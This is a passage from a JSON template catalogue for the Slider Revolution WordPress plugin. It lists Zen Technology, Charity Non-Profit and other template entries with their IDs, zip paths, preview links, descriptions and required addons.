Features\",\"alias\":\"zen-features\",\"zip\":\"packs\\/zen-features.zip\",\"uid\":\"f4f7f500fae57b1b55adace13f030778\",\"img\":\"zen-features\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"459\":{\"id\":\"504\",\"title\":\"Zen Video\",\"alias\":\"zen-video\",\"zip\":\"packs\\/zen-video.zip\",\"uid\":\"fa83df1b45b795174770b1b0155e89f3\",\"img\":\"zen-video\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"460\":{\"id\":\"505\",\"title\":\"Zen Pricing\",\"alias\":\"zen-pricing\",\"zip\":\"packs\\/zen-pricing.zip\",\"uid\":\"921f8e5c156d9027f6ae8f1c5e426251\",\"img\":\"zen-pricing\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"461\":{\"id\":\"506\",\"title\":\"Zen Testimonials Title\",\"alias\":\"zen-testimonials-title\",\"zip\":\"packs\\/zen-testimonials-title.zip\",\"uid\":\"d9aeeb596c0455ddd564a60a2d449b17\",\"img\":\"zen-testimonials-title\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"462\":{\"id\":\"507\",\"title\":\"Zen Testimonials\",\"alias\":\"zen-testimonials\",\"zip\":\"packs\\/zen-testimonials.zip\",\"uid\":\"5a0e0141599c63828e4b99e3bc863366\",\"img\":\"zen-testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"463\":{\"id\":\"508\",\"title\":\"Zen Footer\",\"alias\":\"zen-footer\",\"zip\":\"packs\\/zen-footer.zip\",\"uid\":\"47fb8604e2aafa8cfc97f5af75fda911\",\"img\":\"zen-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"464\":{\"id\":\"509\",\"title\":\"Paintbrush Effect Add-on\",\"alias\":\"Paintbrush-Effect\",\"zip\":\"Paintbrush-Effect.zip\",\"uid\":\"b934d1376df026f0ff45447de17b5ee9\",\"img\":\"Paintbrush-Effect\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/paintbrush-effect-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=paintbrush-effect-collection\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Paintbrush Effect Add-on is the perfect way to add some interactivity to your website with Slider Revolution.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-paintbrush-addon\\\\\\/revslider-paintbrush-addon.php\\\",\\\"name\\\":\\\"Paintbrush AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"473\":{\"id\":\"518\",\"title\":\"Black Friday Scroll Video\",\"alias\":\"black-friday-scroll-video\",\"zip\":\"black-friday-scroll-video.zip\",\"uid\":\"a6a4ab2e2f703aaee0a1e6121881bdd8\",\"img\":\"black-friday-scroll-video\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/black-friday-scroll-video\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=black-friday-scroll-video\",\"version\":\"1.0.1\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Blackfriday offers are coming towards you from the depths of space, with this scroll-based hero module.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-lottie-addon\\\\\\/revslider-lottie-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Lottie AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-scrollvideo-addon\\\\\\/revslider-scrollvideo-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Scroll Video AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Spice Up Your Sales Promotions with a Video Scroll Animation [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/spice-up-your-sales-promotions-with-a-video-scroll-animation\\/\",\"guide_img\":\"tutorial\\/black-friday-scroll-video.png\",\"active\":\"1\",\"installed\":false},\"474\":{\"id\":\"519\",\"title\":\"Charity Non-Profit-Website\",\"alias\":\"charity-non-profit-website\",\"zip\":\"\",\"uid\":\"charity-non-profit-website\",\"img\":\"packages\\/charity-non-profit-website-package.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-lottie-addon\\\\\\/revslider-lottie-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Lottie AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"475\":{\"id\":\"520\",\"title\":\"Charity Menu\",\"alias\":\"charity-menu\",\"zip\":\"packs\\/charity-menu.zip\",\"uid\":\"77794a39041c7f128de3b5ad9b8e7d0d\",\"img\":\"charity-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"476\":{\"id\":\"521\",\"title\":\"Charity Header\",\"alias\":\"charity-header\",\"zip\":\"packs\\/charity-header.zip\",\"uid\":\"36096787d4ed62942cbd48f6a57e9d4f\",\"img\":\"charity-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\" offset=\\\"t:90px,80px,70px,70px;b:0px,0px,0px,0px;l:0px,0px,0px,0px;r:0px,0px,0px,0px;\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"477\":{\"id\":\"522\",\"title\":\"Charity Mission\",\"alias\":\"charity-mission\",\"zip\":\"packs\\/charity-mission.zip\",\"uid\":\"8c5cd67e3eb51c0ca3e571408ac8e97b\",\"img\":\"charity-mission\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-lottie-addon\\\\\\/revslider-lottie-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Lottie AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"478\":{\"id\":\"523\",\"title\":\"Charity Funds\",\"alias\":\"charity-funds\",\"zip\":\"packs\\/charity-funds.zip\",\"uid\":\"10da554c7529ef91965e1618a04b410b\",\"img\":\"charity-funds\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-lottie-addon\\\\\\/revslider-lottie-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Lottie AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"479\":{\"id\":\"524\",\"title\":\"Charity Success\",\"alias\":\"charity-success\",\"zip\":\"packs\\/charity-success.zip\",\"uid\":\"0c35448c1905272606e87447886a348e\",\"img\":\"charity-success\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-lottie-addon\\\\\\/revslider-lottie-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Lottie AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"480\":{\"id\":\"525\",\"title\":\"Charity Stories\",\"alias\":\"charity-stories\",\"zip\":\"packs\\/charity-stories.zip\",\"uid\":\"f277f145d9f9c3f0033bb8ceffeb4c9f\",\"img\":\"charity-stories\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"481\":{\"id\":\"526\",\"title\":\"Charity Worldmap\",\"alias\":\"charity-worldmap\",\"zip\":\"packs\\/charity-worldmap.zip\",\"uid\":\"9e00cbac269b92cb24fd3230297f4685\",\"img\":\"charity-worldmap\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"482\":{\"id\":\"527\",\"title\":\"Charity Large Image\",\"alias\":\"charity-large-image\",\"zip\":\"packs\\/charity-large-image.zip\",\"uid\":\"fa927036c2b14622832106fa987bc8e7\",\"img\":\"charity-large-image\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"483\":{\"id\":\"528\",\"title\":\"Charity Sponsors\",\"alias\":\"charity-sponsors\",\"zip\":\"packs\\/charity-sponsors.zip\",\"uid\":\"efd087bc3fa3915139af9e93d47ee295\",\"img\":\"charity-sponsors\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"484\":{\"id\":\"529\",\"title\":\"Charity Help\",\"alias\":\"charity-help\",\"zip\":\"packs\\/charity-help.zip\",\"uid\":\"4f3571c0b27f061648c9ff95b1a3f718\",\"img\":\"charity-help\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"10\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"485\":{\"id\":\"530\",\"title\":\"Charity Footer\",\"alias\":\"charity-footer\",\"zip\":\"packs\\/charity-footer.zip\",\"uid\":\"9340fa48c56635a8a781cc37c4bf538c\",\"img\":\"charity-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charity-non-profit-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charity-non-profit-website\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Charity Non-Profit-Website\",\"package_order\":\"11\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"41\",\"installed\":false},\"486\":{\"id\":\"531\",\"title\":\"Cinematic Hero Titles\",\"alias\":\"cinematic-hero-titles\",\"zip\":\"cinematic-hero-titles.zip\",\"uid\":\"51a59c54bb97c274092d22dbf4f6085e\",\"img\":\"cinematic-hero-titles\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/cinematic-hero-titles\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cinematic-hero-titles\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Cinematic Hero Titles\\\" template is a collection of fullscreen hero blocks that use a cinematic, animated letter-spacing effect..<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-lottie-addon\\\\\\/revslider-lottie-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Lottie AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-design-a-hero-image\\/\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-design-a-hero-image\\/\",\"guide_img\":\"tutorial\\/cinematic-hero-titles.png\",\"active\":\"1\",\"installed\":false},\"487\":{\"id\":\"532\",\"title\":\"Design DNA Scroll Video\",\"alias\":\"design-dna-scroll-video\",\"zip\":\"design-dna-scroll-video.zip\",\"uid\":\"39180fc9f7a07e50832fc1a68fb4eba2\",\"img\":\"design-dna-scroll-video\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/design-dna-scroll-video\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=design-dna-scroll-video\",\"version\":\"1.0.2\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Design DNA Scroll Video\\\" template is\\u00a0a striking, fullscreen hero module that is using our new Scroll Video addon.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-lottie-addon\\\\\\/revslider-lottie-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Lottie 